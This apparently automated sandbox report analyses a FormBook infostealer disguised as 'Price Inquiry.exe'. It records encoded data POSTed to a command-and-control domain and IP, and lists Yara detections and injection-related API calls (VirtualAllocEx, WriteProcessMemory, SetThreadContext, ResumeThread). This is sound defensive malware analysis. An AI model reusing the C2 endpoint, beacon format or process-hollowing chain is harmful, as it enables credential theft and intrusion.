Oct 15, 2024 16:21:40.925317049 CEST	1830	OUT	POST /mx00/ HTTP/1.1 Host: www.farukugurluakdogan.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Origin: http://www.farukugurluakdogan.xyz Content-Length: 1244 Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://www.farukugurluakdogan.xyz/mx00/ User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18 Data Raw: 4b 32 39 3d 6e 67 4e 2b 57 63 41 78 57 46 39 34 65 42 6d 4b 52 39 5a 45 55 71 72 65 52 4d 64 6b 75 59 33 74 42 6d 48 71 43 75 37 59 71 37 35 65 54 42 79 2b 54 33 41 48 62 41 39 2f 78 61 48 62 4a 34 69 48 67 4c 6d 45 38 61 43 77 37 32 41 49 46 4d 4f 58 64 68 52 6c 71 6c 44 4f 33 67 65 4a 77 71 5a 30 7a 6c 52 65 68 58 53 72 6b 6d 59 65 4f 78 4f 37 54 56 6c 38 4c 6b 37 62 77 30 4f 79 48 48 6b 30 6b 30 4a 43 39 78 57 69 6f 4f 2b 47 6c 70 46 75 61 72 53 61 63 64 79 48 43 78 53 31 6c 4b 69 65 64 6f 6a 49 66 47 78 2b 39 33 57 43 76 39 73 70 4f 77 6d 2b 49 34 4f 6e 68 6e 52 44 4c 54 32 30 2f 62 45 32 69 38 74 4b 44 61 46 68 61 6c 70 4b 53 44 33 4a 48 6d 4a 44 2f 5a 71 56 72 39 44 30 31 68 59 36 4e 7a 35 35 73 72 56 4a 42 72 6d 50 4c 50 59 6b 59 6c 68 67 79 48 5a 37 62 32 4d 52 65 4b 6f 30 49 38 51 68 74 4a 43 34 77 51 47 30 6e 48 42 67 6e 69 53 69 39 44 61 4a 62 71 6c 51 42 73 4f 46 33 36 73 6b 67 68 64 55 79 77 4d 44 51 67 41 38 42 7a 7a 38 76 68 7a 72 41 67 41 6f 52 43 43 6a 75 47 4e 4f 41 72 2b 55 4f 62 [TRUNCATED] Data Ascii: K29=ngN+WcAxWF94eBmKR9ZEUqreRMdkuY3tBmHqCu7Yq75eTBy+T3AHbA9/xaHbJ4iHgLmE8aCw72AIFMOXdhRlqlDO3geJwqZ0zlRehXSrkmYeOxO7TVl8Lk7bw0OyHHk0k0JC9xWioO+GlpFuarSacdyHCxS1lKiedojIfGx+93WCv9spOwm+I4OnhnRDLT20/bE2i8tKDaFhalpKSD3JHmJD/ZqVr9D01hY6Nz55srVJBrmPLPYkYlhgyHZ7b2MReKo0I8QhtJC4wQG0nHBgniSi9DaJbqlQBsOF36skghdUywMDQgA8Bzz8vhzrAgAoRCCjuGNOAr+UObTdU7Vkt7+4de5THUuf3MwvLDdST4KwaawtEZ2mb48mBSB6G1Ga3jI6RdT4zZF42XV+1XKwkSGabdBOsjlNuzDAfEF0TLP1qeQonM/33kUi5uzrTq0R/qKTG4RAIAPdSq2W+jYO4/uskYgOZ6mSRjJ+b0W/E4Rxf1vaW3NgWr6i9FoW3+q1xb9FnJ/SIB47+pL1cAg6BjiOXVYSgWKXg5olNu5e+XMRk+BoipnZYD2QOwaoxsFegpzyruv2xSWOQTcN5jdH8TBKThA9D9yQsLTT1Zc4VuLi4dZp0Qkk/mnQlROxuG6E/6EfLxRFnUUF3QxVLktZOhD5ylzO2BQRxq2SmBPoahaJGwKiRYn9xyxwOce4Dqa3s+5fozlmqOWfti3fZgZ1o59TCGKwKP7rUQ6/t3DzMmY4EFwniKC2jXD9DXEiqN3LyKF7DeX2FJrAGhHn6ewNJ9m+nndsUuyqojwX6T5FqSGm80iELATNe7sGlScfrB0KsXZYUOrQU89KSATinhq+ugmxikqjJ+aO8TyRmVik6kzwooiJYZRyX7W78bIYRLTzdvIQ3Fda8GRukM7XVNwCdcBbh9LwBS/E78BbVGA3QgZRIGKASuw/qxd/ofyJSBtg2W0glgvFrBcuDuney2Rr0f+GlkUnqnN0I3Su0l56rSnG27/G [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.6	53146	85.159.66.93	80	3840	C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe

Timestamp	Bytes transferred	Direction	Data
Oct 15, 2024 16:21:43.465456963 CEST	519	OUT	GET /mx00/?K29=qileVsN1diZFcCO3Qsw4YZf+VstA9OzPNQ7Oa8/FkrUJR0uYa1wUZggpoqScYraC15jy36uBsEEpRc6ILD1+qn3sxTmn99lW3lhfvmyegl4mHUSFQDpcAgCp0FvLAl8XjhJr2UE=&ahL=jjndrjuPIn2hz HTTP/1.1 Host: www.farukugurluakdogan.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.18) Gecko/20110628 Ubuntu/10.04 (lucid) Firefox/3.6.18
Oct 15, 2024 16:22:44.445557117 CEST	194	IN	HTTP/1.0 504 Gateway Time-out Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 34 20 47 61 74 65 77 61 79 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 0a 54 68 65 20 73 65 72 76 65 72 20 64 69 64 6e 27 74 20 72 65 73 70 6f 6e 64 20 69 6e 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>504 Gateway Time-out</h1>The server didn't respond in time.</body></html>

Target ID:	0
Start time:	10:18:33
Start date:	15/10/2024
Path:	C:\Users\user\Desktop\Price Inquiry.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Price Inquiry.exe"
Imagebase:	0xa30000
File size:	779'776 bytes
MD5 hash:	E54162509760C0E8081C8157EC2E8198
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	10:18:35
Start date:	15/10/2024
Path:	C:\Users\user\Desktop\Price Inquiry.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\Price Inquiry.exe"
Imagebase:	0x270000
File size:	779'776 bytes
MD5 hash:	E54162509760C0E8081C8157EC2E8198
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	10:18:35
Start date:	15/10/2024
Path:	C:\Users\user\Desktop\Price Inquiry.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Price Inquiry.exe"
Imagebase:	0xbd0000
File size:	779'776 bytes
MD5 hash:	E54162509760C0E8081C8157EC2E8198
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2435065362.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.2435065362.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2460854368.00000000047D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.2460854368.00000000047D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2438337305.0000000002430000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.2438337305.0000000002430000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	10:18:53
Start date:	15/10/2024
Path:	C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe"
Imagebase:	0x2b0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4627308589.0000000003750000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4627308589.0000000003750000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	10:18:55
Start date:	15/10/2024
Path:	C:\Windows\SysWOW64\tzutil.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\tzutil.exe"
Imagebase:	0x630000
File size:	48'640 bytes
MD5 hash:	31DE852CCF7CED517CC79596C76126B4
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.4627716653.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.4627716653.0000000002DC0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.4627610599.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.4627610599.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.4620677236.0000000000590000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.4620677236.0000000000590000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	10:19:08
Start date:	15/10/2024
Path:	C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\MEfwFCeLoyzkUEHsoxGbRboBRshUiJaOZnONOFcplzTYGnhg\pfyyryeDyx.exe"
Imagebase:	0x2b0000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	10:19:21
Start date:	15/10/2024
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff728280000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	10%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	187
Total number of Limit Nodes:	13

Executed Functions

Function 08E87B30 Relevance: 3.0, Strings: 2, Instructions: 527
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

:, xrefs: 08E87D88
~, xrefs: 08E87D3D

Memory Dump Source

Source File: 00000000.00000002.2183152770.0000000008E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e80000_Price Inquiry.jbxd

Similarity

API ID:
String ID: :$~
API String ID: 0-2431124681
Opcode ID: 049c1c910e91fdcea98fb43e17fda05db11b1a8f09286e98aba6d6a5cc52827d
Instruction ID: 252157f7dfb500c7ec95d42bd4099e3ca209b4e23ef1a2ae45de3d189b98d73b
Opcode Fuzzy Hash: 049c1c910e91fdcea98fb43e17fda05db11b1a8f09286e98aba6d6a5cc52827d
Instruction Fuzzy Hash: F732D176A00218DFDB15DFA9C980A9DBBB2FF49304F1580E9E509AB361DB31AD91CF50

Function 076B6BE8 Relevance: .6, Instructions: 636COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2182617401.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_76b0000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a07a9d1de91bd91b520ae4040043a577b4bd9670078adaac4c288edbd45083fb
Instruction ID: 2c4dc86b162faa5fa40c557eb604105637cc97230619e18a45ca85cd33930bfa
Opcode Fuzzy Hash: a07a9d1de91bd91b520ae4040043a577b4bd9670078adaac4c288edbd45083fb
Instruction Fuzzy Hash: B532ACB0B012458FDB29DB74D550BAEBBF6AF8A304F24446AE106DB3A5CB31ED41CB51

Function 08E8D5E9 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2183152770.0000000008E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08E80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8e80000_Price Inquiry.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f7759acc89b14113e65c90058c9791694941bba4dfc71f696d515c6819a128d
Instruction ID: 48b60b489445411b82d023f4d0a35ebb6ea95b6da721308159687e5bd11a111c
Opcode Fuzzy Hash: 5f7759acc89b14113e65c90058c9791694941bba4dfc71f696d515c6819a128d
Instruction Fuzzy Hash: 1D21F7B1E056588BEB18CFA6C9443DEFBF3AF88300F14C16AD408A7295DB7409458F90

Function 076B3A25 Relevance: 1.8, APIs: 1, Instructions: 251
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 076B3C66

Memory Dump Source

Source File: 00000000.00000002.2182617401.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_76b0000_Price Inquiry.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 6146bb0f53d11bb4b88af9aa4aae4aed6fd76b59c7ed908d1d5ec1277cd58ddf
Instruction ID: 421a64bc5807c0ed5a5286477930ab260611e09f7e50c5c13848b4827d0df08b
Opcode Fuzzy Hash: 6146bb0f53d11bb4b88af9aa4aae4aed6fd76b59c7ed908d1d5ec1277cd58ddf
Instruction Fuzzy Hash: 43A14BB1E0021ADFEB24CF69C841BDDBBB2EF49314F1481A9E809A7344DB749985CF91

Function 076B3A30 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 076B3C66

Memory Dump Source

Source File: 00000000.00000002.2182617401.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_76b0000_Price Inquiry.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 23cc8a834db31418448b9da1d0c032ef875ef5105263f5c4055afdcfdeb434aa
Instruction ID: 2e9b8ce8470e64a89fef0cc4b920b0cbf4e69b31affc3d1b1d801ab0873a36d7
Opcode Fuzzy Hash: 23cc8a834db31418448b9da1d0c032ef875ef5105263f5c4055afdcfdeb434aa
Instruction Fuzzy Hash: 69913BB1E0021ADFEB24CF69C841BDDBBB2EF49314F1481A9E809A7344DB749985CF91

Function 0111B3F9 Relevance: 1.7, APIs: 1, Instructions: 201
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0111B65E

Memory Dump Source

Source File: 00000000.00000002.2177255482.0000000001110000.00000040.00000800.00020000.00000000.sdmp, Offset: 01110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1110000_Price Inquiry.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: d1dd355b4ec37662192432d50d04444a8cdb167958ced4d8308e1d5a8cc5c689
Instruction ID: b1e0901fb034a29da095b36673c8a3a2cb14b86334cec833f90c6f2b14684cdd
Opcode Fuzzy Hash: d1dd355b4ec37662192432d50d04444a8cdb167958ced4d8308e1d5a8cc5c689
Instruction Fuzzy Hash: 1E815670A04B058FD728DF29D05079ABBF1FF88304F008A2DD58ADBA54EB74E845CB95

Function 011144B4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 011159A9

Memory Dump Source

Source File: 00000000.00000002.2177255482.0000000001110000.00000040.00000800.00020000.00000000.sdmp, Offset: 01110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1110000_Price Inquiry.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: f39aeaae1f0698349b77f62508938e750d61e323ed4c7fcc4cb03f16ff770b48
Instruction ID: fa4fb79dbb3a18d1caddb555b045f3884ee1a9b28fba4e61e80d4b20edaf0eec
Opcode Fuzzy Hash: f39aeaae1f0698349b77f62508938e750d61e323ed4c7fcc4cb03f16ff770b48
Instruction Fuzzy Hash: 51410470C0071DCBDB24DFA9C98478DFBB6BF89304F20806AD408AB255DB716945CF91

Function 011158EC Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 011159A9

Memory Dump Source

Source File: 00000000.00000002.2177255482.0000000001110000.00000040.00000800.00020000.00000000.sdmp, Offset: 01110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1110000_Price Inquiry.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 71287b9b1238bffdb78fc5d650006916b0fe1877f14a8cfec6f1ad664bb187a9
Instruction ID: 0c47d5cad2fbd48074f26a3174dab765b6445a6e5cd0afd7897542c6eda8f976
Opcode Fuzzy Hash: 71287b9b1238bffdb78fc5d650006916b0fe1877f14a8cfec6f1ad664bb187a9
Instruction Fuzzy Hash: 8541F1B1C0071DCFEB24DFA9C984B8EBBB6BF89304F20816AD408AB255DB756945CF50

Function 076B37A0 Relevance: 1.6, APIs: 1, Instructions: 75
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 076B3838

Memory Dump Source

Source File: 00000000.00000002.2182617401.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_76b0000_Price Inquiry.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 4e5ca952ee0eb104eb9247eecb4864c953642b4dc7642362c93c011ac2898421
Instruction ID: f3f0a7a12f4c650a601e803ff76b65fc8beec013b6b5d7b4e2cd66ca2b5e579e
Opcode Fuzzy Hash: 4e5ca952ee0eb104eb9247eecb4864c953642b4dc7642362c93c011ac2898421
Instruction Fuzzy Hash: 702137B19003599FDB10DFAAC881BDEBBF5FF48310F10842AE919A7340D778A955CBA5

Function 076B37A8 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 076B3838

Memory Dump Source

Source File: 00000000.00000002.2182617401.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_76b0000_Price Inquiry.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 304825b2298417e08aea0ed15a3a9c8bea617f4d1e90f9fd31e660382d99b192
Instruction ID: 8068fc3623663013cdc5cdfd0cd187f0e2a8003007ee9126f7cc9c855b18badb
Opcode Fuzzy Hash: 304825b2298417e08aea0ed15a3a9c8bea617f4d1e90f9fd31e660382d99b192
Instruction Fuzzy Hash: CE2126B19003599FDB10CFAAC881BDEBBF5FF48310F10842AE919A7340D7789954CBA5

Function 076B3608 Relevance: 1.6, APIs: 1, Instructions: 68
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 076B368E

Memory Dump Source

Source File: 00000000.00000002.2182617401.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_76b0000_Price Inquiry.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: a191ad70bfb178353582162238404c17bea8d51d7fd6c87b6cf771cbe03ac998
Instruction ID: 8c26b5dc86da787dbb1af37d874c553bd2fa0a0f0e77dee379a2bf3108f798da
Opcode Fuzzy Hash: a191ad70bfb178353582162238404c17bea8d51d7fd6c87b6cf771cbe03ac998
Instruction Fuzzy Hash: BE2159B19003199FDB10DFAAC8857EEBBF4EF48324F14842AD519A7341DB78A544CBA5

Function 076B3890 Relevance: 1.6, APIs: 1, Instructions: 68
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 076B3918

Memory Dump Source

Source File: 00000000.00000002.2182617401.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_76b0000_Price Inquiry.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: c1559cf529dde2b686e8338299b0e1901d3642d24c18e06119f9371b9a892292
Instruction ID: 47f60b71b40a3a48dc1c0b5692f286e44ef594fb7cb86e87a059d08506efc9a3
Opcode Fuzzy Hash: c1559cf529dde2b686e8338299b0e1901d3642d24c18e06119f9371b9a892292
Instruction Fuzzy Hash: F22169B190035A9FDB10CFAAC881ADEBBF4FF48320F10842AE518A7240C7789940CBA1

Function 0111B2F4 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0111D8AE,?,?,?,?,?), ref: 0111D96F

Memory Dump Source

Source File: 00000000.00000002.2177255482.0000000001110000.00000040.00000800.00020000.00000000.sdmp, Offset: 01110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1110000_Price Inquiry.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 8b4eee7def9644b2207a43b3fec3e8b3fe26c906eda3a3ed6002631e0342dc36
Instruction ID: e93f1038cb2c1f0ad5c04f4ca8d073f15d6cfc55a1cb5842b77c74c1c2716f81
Opcode Fuzzy Hash: 8b4eee7def9644b2207a43b3fec3e8b3fe26c906eda3a3ed6002631e0342dc36
Instruction Fuzzy Hash: 5921E5B5900209DFDB10CF9AD984ADEFBF5EB48310F14842AE918A7350D374A954CFA5

Function 076B3610 Relevance: 1.6, APIs: 1, Instructions: 63
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 076B368E

Memory Dump Source

Source File: 00000000.00000002.2182617401.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_76b0000_Price Inquiry.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 26427dbd8593ec1e25dc3593626a5bd55311dd0fa650eb8ea4a428a0c3b8556b
Instruction ID: 5ff9f68f5b94b23390281499df85e799fe80386748c42a3da8fbb4ade87a9efa
Opcode Fuzzy Hash: 26427dbd8593ec1e25dc3593626a5bd55311dd0fa650eb8ea4a428a0c3b8556b
Instruction Fuzzy Hash: F32107B19003099FDB10DFAAC8857EEBBF4EF89224F14842AD519A7341DB789944CBA5

Function 076B3898 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 076B3918

Memory Dump Source

Source File: 00000000.00000002.2182617401.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_76b0000_Price Inquiry.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: e03848ae883cf7bcfb598de2b90605688eecb8152c087ec9b8c507d1b57e056b
Instruction ID: aec7b53767b4c5021cb2feabf46ea3b533a976e4e748b04ac3d88ea772cd03b9
Opcode Fuzzy Hash: e03848ae883cf7bcfb598de2b90605688eecb8152c087ec9b8c507d1b57e056b
Instruction Fuzzy Hash: 552116B19003599FDB10DFAAC881ADEBBF5FF48310F10842AE519A7240D7789954CBA5

Function 0111D8E0 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0111D8AE,?,?,?,?,?), ref: 0111D96F

Memory Dump Source

Source File: 00000000.00000002.2177255482.0000000001110000.00000040.00000800.00020000.00000000.sdmp, Offset: 01110000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1110000_Price Inquiry.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: dbc8468d5b4acabcbdbaf075cecab36b3aa8b8a89290a2f857e508da0fc75a2b
Instruction ID: a426f9bcd5f7be8fab140dd75a987b4e7e51db11d381b844de4c8a29dc01ee39
Opcode Fuzzy Hash: dbc8468d5b4acabcbdbaf075cecab36b3aa8b8a89290a2f857e508da0fc75a2b
Instruction Fuzzy Hash: 5021E3B5D00249DFDB10CFA9D984ADEFBF5FB48320F14845AE954A3250D378A954CF60

Function 076B36E0 Relevance: 1.6, APIs: 1, Instructions: 56
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 076B3756

Memory Dump Source

Source File: 00000000.00000002.2182617401.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_76b0000_Price Inquiry.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 23433152e431bc8ea6e9a0020b68897341ab324a79bb7e81b13914c04a1ba688
Instruction ID: 483746d551eac4c2ba74cebdf75bac9ed7cf1a4c89e79b96ec45d4dd833944f8
Opcode Fuzzy Hash: 23433152e431bc8ea6e9a0020b68897341ab324a79bb7e81b13914c04a1ba688
Instruction Fuzzy Hash: CE1159B69002499FDB10DFAAC8457DEBBF5EF88320F108819E919A7250CB75A550CB95

Function 076B36E8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 076B3756

Memory Dump Source

Source File: 00000000.00000002.2182617401.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_76b0000_Price Inquiry.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 416b3e534323413533436f6c4a8982a6c45db67aa130012e3b9dfb4e81f2640e
Instruction ID: d0ba912952835ed06af90f983125e632c68ec3e607e09c21aa4e56973baf96d7
Opcode Fuzzy Hash: 416b3e534323413533436f6c4a8982a6c45db67aa130012e3b9dfb4e81f2640e
Instruction Fuzzy Hash: 1D1156B29002499FDB20DFAAC844BDEBBF5EF88320F108819E519A7250C775A550CBA5

Function 076B3558 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 076B35C2

Memory Dump Source

Source File: 00000000.00000002.2182617401.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_76b0000_Price Inquiry.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 4e750b149a67f3cf2852196fb2a1f0a01b0efbdc8e378aba0c86ab99f73d9a8c
